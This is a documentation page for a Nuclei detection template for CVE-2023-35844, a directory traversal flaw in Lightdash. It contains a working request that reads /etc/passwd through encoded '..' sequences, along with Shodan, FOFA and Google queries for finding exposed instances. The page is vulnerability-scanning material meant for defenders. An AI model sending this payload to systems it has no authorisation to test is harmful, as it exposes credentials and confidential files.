Skip to content
Nuclei Templates

Lightdash version <= 0.510.3 Arbitrary File Read

ID: CVE-2023-35844

Severity: high

Author: dwisiswant0

Tags: cve,cve2023,lightdash,lfi

Description

Section titled “Description”

packages/backend/src/routers in Lightdash before 0.510.3has insecure file endpoints, e.g., they allow .. directorytraversal and do not ensure that an intended file extension(.csv or .png) is used.

YAML Source

Section titled “YAML Source”
id: CVE-2023-35844


info:
  name: Lightdash version <= 0.510.3 Arbitrary File Read
  author: dwisiswant0
  severity: high
  description: |
    packages/backend/src/routers in Lightdash before 0.510.3
    has insecure file endpoints, e.g., they allow .. directory
    traversal and do not ensure that an intended file extension
    (.csv or .png) is used.
  impact: |
    The vulnerability can lead to unauthorized access to sensitive information, potentially exposing user credentials, database credentials, and other confidential data.
  remediation: |
    Upgrade Lightdash to a version higher than 0.510.3 to mitigate the vulnerability.
  reference:
    - https://advisory.dw1.io/59
    - https://nvd.nist.gov/vuln/detail/CVE-2023-35844
    - https://github.com/lightdash/lightdash/commit/fcc808c84c2cc3afb343063e32a49440d32a553c
    - https://github.com/lightdash/lightdash/compare/0.510.2...0.510.3
    - https://github.com/lightdash/lightdash/pull/5090
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-35844
    cwe-id: CWE-22
    epss-score: 0.04986
    epss-percentile: 0.92655
    cpe: cpe:2.3:a:lightdash:lightdash:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: lightdash
    product: lightdash
    shodan-query:
      - title:"Lightdash"
      - http.title:"lightdash"
    fofa-query: title="lightdash"
    google-query: intitle:"lightdash"
  tags: cve,cve2023,lightdash,lfi


http:
  - method: GET
    path:
      - "{{BaseURL}}/api/v1/slack/image/slack-image{{repeat('%2F..', 3)}}%2Fetc%2Fpasswd"


    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"


      - type: status
        status:
          - 200
# digest: 4a0a00473045022012da6f99398ebc7af34bea9c90c8fa524415897bb2d909cc45276e17d4a25215022100f6de7c6fc2ed22612ad208af449fe9fef9c333512dd3ba30bf0c13e610a60868:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-35844.yaml"

View on Github